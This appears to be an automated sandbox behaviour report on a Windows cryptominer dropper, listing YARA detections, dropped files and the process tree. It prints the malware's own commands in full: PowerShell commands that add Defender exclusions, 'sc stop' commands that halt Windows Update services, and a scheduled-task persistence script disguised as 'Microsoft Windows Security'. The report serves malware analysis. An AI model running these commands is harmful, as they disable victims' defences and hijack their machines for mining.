                                System Summary

                                barindex
                                Source: 34.2.winupsecvmgr.exe.7ff7ad1eca40.1.raw.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                                Source: 34.2.winupsecvmgr.exe.7ff7ad1eca40.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                                Source: 34.2.winupsecvmgr.exe.7ff7ad1eca40.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
                                Source: 34.2.winupsecvmgr.exe.7ff7ad1b0000.0.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                                Source: 34.2.winupsecvmgr.exe.7ff7ad1b0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                                Source: 34.2.winupsecvmgr.exe.7ff7ad1b0000.0.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
                                Source: 34.2.winupsecvmgr.exe.7ff7ad1f0320.2.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                                Source: 34.2.winupsecvmgr.exe.7ff7ad1f0320.2.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                                Source: 34.2.winupsecvmgr.exe.7ff7ad1f0320.2.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
                                Source: 34.2.winupsecvmgr.exe.7ff7ad1f0320.2.raw.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                                Source: 34.2.winupsecvmgr.exe.7ff7ad1f0320.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                                Source: 34.2.winupsecvmgr.exe.7ff7ad1f0320.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
                                Source: 00000022.00000002.3142710101.00007FF7AD1CB000.00000004.00000001.01000000.00000010.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                                Source: Process Memory Space: winupsecvmgr.exe PID: 4044, type: MEMORYSTRMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                                Source: C:\Users\user\AppData\Local\Temp\jacrzswcvuml.tmp, type: DROPPEDMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                                Source: C:\Users\user\AppData\Local\Temp\jacrzswcvuml.tmp, type: DROPPEDMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                                Source: C:\Users\user\AppData\Local\Temp\jacrzswcvuml.tmp, type: DROPPEDMatched rule: Detects coinmining malware Author: ditekSHen
                                Source: C:\Users\user\AppData\Local\Temp\21324.scrCode function: 3_2_0040FB45 NtQueryVirtualMemory,3_2_0040FB45
                                Source: C:\Users\user\AppData\Local\Temp\21324.scrCode function: 3_2_0040DF20 NtQuerySystemTime,RtlTimeToSecondsSince1980,3_2_0040DF20
                                Source: C:\Windows\sysppvrdnvs.exeCode function: 4_2_0040FB45 NtQueryVirtualMemory,4_2_0040FB45
                                Source: C:\Windows\sysppvrdnvs.exeCode function: 4_2_0040DF20 NtQuerySystemTime,RtlTimeToSecondsSince1980,4_2_0040DF20
                                Source: C:\Windows\sysppvrdnvs.exeCode function: 18_2_0040FB45 NtQueryVirtualMemory,18_2_0040FB45
                                Source: C:\Windows\sysppvrdnvs.exeCode function: 18_2_0040DF20 NtQuerySystemTime,RtlTimeToSecondsSince1980,18_2_0040DF20
                                Source: C:\Users\user\AppData\Local\Temp\1881231804.exeCode function: 19_2_00007FFD34780F11 NtQuerySystemInformation,19_2_00007FFD34780F11
                                Source: C:\Windows\System32\conhost.exeCode function: 37_2_00007FF7B89A3F40 NtReadFile,37_2_00007FF7B89A3F40
                                Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exeFile created: C:\Users\user\AppData\Roaming\Google\Libs\WR64.sys
                                Source: C:\Users\user\AppData\Local\Temp\21324.scrFile created: C:\Windows\sysppvrdnvs.exeJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\21324.scrCode function: 3_2_004084D03_2_004084D0
                                Source: C:\Users\user\AppData\Local\Temp\21324.scrCode function: 3_2_004084F93_2_004084F9
                                Source: C:\Users\user\AppData\Local\Temp\21324.scrCode function: 3_2_004040903_2_00404090
                                Source: C:\Users\user\AppData\Local\Temp\21324.scrCode function: 3_2_0040AEB03_2_0040AEB0
                                Source: C:\Users\user\AppData\Local\Temp\21324.scrCode function: 3_2_004049703_2_00404970
                                Source: C:\Users\user\AppData\Local\Temp\21324.scrCode function: 3_2_0040F9083_2_0040F908
                                Source: C:\Windows\sysppvrdnvs.exeCode function: 4_2_004084D04_2_004084D0
                                Source: C:\Windows\sysppvrdnvs.exeCode function: 4_2_004084F94_2_004084F9
                                Source: C:\Windows\sysppvrdnvs.exeCode function: 4_2_004040904_2_00404090
                                Source: C:\Windows\sysppvrdnvs.exeCode function: 4_2_0040AEB04_2_0040AEB0
                                Source: C:\Windows\sysppvrdnvs.exeCode function: 4_2_004049704_2_00404970
                                Source: C:\Windows\sysppvrdnvs.exeCode function: 4_2_0040F9084_2_0040F908
                                Source: C:\Windows\sysppvrdnvs.exeCode function: 18_2_004084D018_2_004084D0
                                Source: C:\Windows\sysppvrdnvs.exeCode function: 18_2_004084F918_2_004084F9
                                Source: C:\Windows\sysppvrdnvs.exeCode function: 18_2_0040409018_2_00404090
                                Source: C:\Windows\sysppvrdnvs.exeCode function: 18_2_0040AEB018_2_0040AEB0
                                Source: C:\Windows\sysppvrdnvs.exeCode function: 18_2_0040497018_2_00404970
                                Source: C:\Windows\sysppvrdnvs.exeCode function: 18_2_0040F90818_2_0040F908
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 30_2_00007FFD347934FA30_2_00007FFD347934FA
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 30_2_00007FFD3479A8FB30_2_00007FFD3479A8FB
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 30_2_00007FFD3479B8F230_2_00007FFD3479B8F2
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 30_2_00007FFD3479B9F230_2_00007FFD3479B9F2
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 30_2_00007FFD347971F330_2_00007FFD347971F3
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 30_2_00007FFD347952FA30_2_00007FFD347952FA
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 30_2_00007FFD3479B6FD30_2_00007FFD3479B6FD
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 30_2_00007FFD347992B430_2_00007FFD347992B4
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 30_2_00007FFD34793BF230_2_00007FFD34793BF2
                                Source: C:\Windows\System32\conhost.exeCode function: 37_2_00007FF7B89B85C037_2_00007FF7B89B85C0
                                Source: C:\Windows\System32\conhost.exeCode function: 37_2_00007FF7B89A719037_2_00007FF7B89A7190
                                Source: C:\Windows\System32\conhost.exeCode function: 37_2_00007FF7B89B3DE037_2_00007FF7B89B3DE0
                                Source: C:\Windows\System32\conhost.exeCode function: 37_2_00007FF7B89B6D8037_2_00007FF7B89B6D80
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 38_2_00007FFD347792FA38_2_00007FFD347792FA
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 38_2_00007FFD347752FA38_2_00007FFD347752FA
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 38_2_00007FFD3477A7F238_2_00007FFD3477A7F2
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 38_2_00007FFD3477302738_2_00007FFD34773027
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 38_2_00007FFD34773BCA38_2_00007FFD34773BCA
                                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\nxmr[1].exe 1753AD35ECE25AB9A19048C70062E9170F495E313D7355EBBBA59C38F5D90256
                                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\tdrpl[1].exe 9EAAADF3857E4A3E83F4F78D96AB185213B6528C8E470807F9D16035DAADF33D
                                Source: C:\Windows\System32\conhost.exeCode function: String function: 00007FF7B89A3F40 appears 34 times
                                Source: nxmr[1].exe.27.drStatic PE information: Number of sections : 11 > 10
                                Source: winupsecvmgr.exe.28.drStatic PE information: Number of sections : 11 > 10
                                Source: 1239611256.exe.27.drStatic PE information: Number of sections : 11 > 10
                                Source: 1881231804.exe.4.drStatic PE information: No import functions for PE file found
                                Source: Us051y7j25.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
                                Source: 34.2.winupsecvmgr.exe.7ff7ad1eca40.1.raw.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                                Source: 34.2.winupsecvmgr.exe.7ff7ad1eca40.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                                Source: 34.2.winupsecvmgr.exe.7ff7ad1eca40.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                                Source: 34.2.winupsecvmgr.exe.7ff7ad1b0000.0.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                                Source: 34.2.winupsecvmgr.exe.7ff7ad1b0000.0.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                                Source: 34.2.winupsecvmgr.exe.7ff7ad1b0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                                Source: 34.2.winupsecvmgr.exe.7ff7ad1f0320.2.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                                Source: 34.2.winupsecvmgr.exe.7ff7ad1f0320.2.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                                Source: 34.2.winupsecvmgr.exe.7ff7ad1f0320.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                                Source: 34.2.winupsecvmgr.exe.7ff7ad1f0320.2.raw.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                                Source: 34.2.winupsecvmgr.exe.7ff7ad1f0320.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                                Source: 34.2.winupsecvmgr.exe.7ff7ad1f0320.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                                Source: 00000022.00000002.3142710101.00007FF7AD1CB000.00000004.00000001.01000000.00000010.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                                Source: Process Memory Space: winupsecvmgr.exe PID: 4044, type: MEMORYSTRMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                                Source: C:\Users\user\AppData\Local\Temp\jacrzswcvuml.tmp, type: DROPPEDMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                                Source: C:\Users\user\AppData\Local\Temp\jacrzswcvuml.tmp, type: DROPPEDMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                                Source: C:\Users\user\AppData\Local\Temp\jacrzswcvuml.tmp, type: DROPPEDMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                                Source: classification engineClassification label: mal100.troj.evad.mine.winEXE@64/42@1/40
                                Source: C:\Users\user\AppData\Local\Temp\21324.scrCode function: 3_2_00406F70 Sleep,GetModuleFileNameW,GetVolumeInformationW,GetDiskFreeSpaceExW,_aulldiv,wsprintfW,wsprintfW,wsprintfW,Sleep,ExitThread,3_2_00406F70
                                Source: C:\Users\user\AppData\Local\Temp\21324.scrCode function: 3_2_00406660 CoInitialize,CoCreateInstance,wsprintfW,wsprintfW,3_2_00406660
                                Source: C:\Users\user\Desktop\Us051y7j25.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\tdrpl[1].exeJump to behavior
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5724:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5804:120:WilError_03
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                                Source: C:\Windows\sysppvrdnvs.exeMutant created: \Sessions\1\BaseNamedObjects\mmn7nnm8na
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6704:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5612:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2188:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6688:120:WilError_03
                                Source: C:\Windows\System32\dwm.exeMutant created: \Sessions\1\BaseNamedObjects\Global\vljmdnomkxppwbqz
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6788:120:WilError_03
                                Source: C:\Users\user\Desktop\Us051y7j25.exeFile created: C:\Users\user\AppData\Local\Temp\21324.scrJump to behavior
                                Source: C:\Users\user\Desktop\Us051y7j25.exeCommand line argument: WinDefucker0_2_001410B0
                                Source: C:\Users\user\Desktop\Us051y7j25.exeCommand line argument: 7d77w7d70_2_001410B0
                                Source: C:\Users\user\Desktop\Us051y7j25.exeCommand line argument: fuyuyuyuyuyu0_2_001410B0
                                Source: C:\Users\user\Desktop\Us051y7j25.exeCommand line argument: %s\%s0_2_001410B0
                                Source: C:\Users\user\Desktop\Us051y7j25.exeCommand line argument: %s\%d%s0_2_001410B0
                                Source: Us051y7j25.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                Source: C:\Users\user\AppData\Local\Temp\1881231804.exeSystem information queried: HandleInformationJump to behavior
                                Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
                                Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name=&quot;csrss.exe&quot;
                                Source: C:\Users\user\Desktop\Us051y7j25.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                                Source: C:\Users\user\Desktop\Us051y7j25.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                Source: Us051y7j25.exeVirustotal: Detection: 41%
                                Source: Us051y7j25.exeReversingLabs: Detection: 42%
                                Source: unknownProcess created: C:\Users\user\Desktop\Us051y7j25.exe "C:\Users\user\Desktop\Us051y7j25.exe"
                                Source: C:\Users\user\Desktop\Us051y7j25.exeProcess created: C:\Users\user\AppData\Local\Temp\21324.scr "C:\Users\user\AppData\Local\Temp\21324.scr" /S
                                Source: C:\Users\user\AppData\Local\Temp\21324.scrProcess created: C:\Windows\sysppvrdnvs.exe C:\Windows\sysppvrdnvs.exe
                                Source: C:\Windows\sysppvrdnvs.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\sysppvrdnvs.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc stop UsoSvc
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc stop WaaSMedicSvc
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc stop wuauserv
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc stop DoSvc
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc stop BITS /wait
                                Source: unknownProcess created: C:\Windows\sysppvrdnvs.exe "C:\Windows\sysppvrdnvs.exe"
                                Source: C:\Windows\sysppvrdnvs.exeProcess created: C:\Users\user\AppData\Local\Temp\1881231804.exe C:\Users\user\AppData\Local\Temp\1881231804.exe
                                Source: C:\Users\user\AppData\Local\Temp\1881231804.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Users\user\AppData\Local\Temp\1881231804.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /delete /f /tn "Windows Upgrade Manager"
                                Source: C:\Windows\sysppvrdnvs.exeProcess created: C:\Users\user\AppData\Local\Temp\2314627202.exe C:\Users\user\AppData\Local\Temp\2314627202.exe
                                Source: C:\Windows\sysppvrdnvs.exeProcess created: C:\Users\user\AppData\Local\Temp\1091722296.exe C:\Users\user\AppData\Local\Temp\1091722296.exe
                                Source: C:\Users\user\AppData\Local\Temp\1091722296.exeProcess created: C:\Users\user\AppData\Local\Temp\1239611256.exe C:\Users\user\AppData\Local\Temp\1239611256.exe
                                Source: C:\Windows\sysppvrdnvs.exeProcess created: C:\Users\user\AppData\Local\Temp\146916724.exe C:\Users\user\AppData\Local\Temp\146916724.exe
                                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: unknownProcess created: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe "C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe"
                                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe
                                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ydcfdz#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exeProcess created: C:\Windows\System32\dwm.exe C:\Windows\System32\dwm.exe
                                Source: unknownProcess created: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe "C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe"
                                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Users\user\Desktop\Us051y7j25.exeProcess created: C:\Users\user\AppData\Local\Temp\21324.scr "C:\Users\user\AppData\Local\Temp\21324.scr" /SJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\21324.scrProcess created: C:\Windows\sysppvrdnvs.exe C:\Windows\sysppvrdnvs.exeJump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"Jump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /waitJump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeProcess created: C:\Users\user\AppData\Local\Temp\1881231804.exe C:\Users\user\AppData\Local\Temp\1881231804.exeJump to behavior
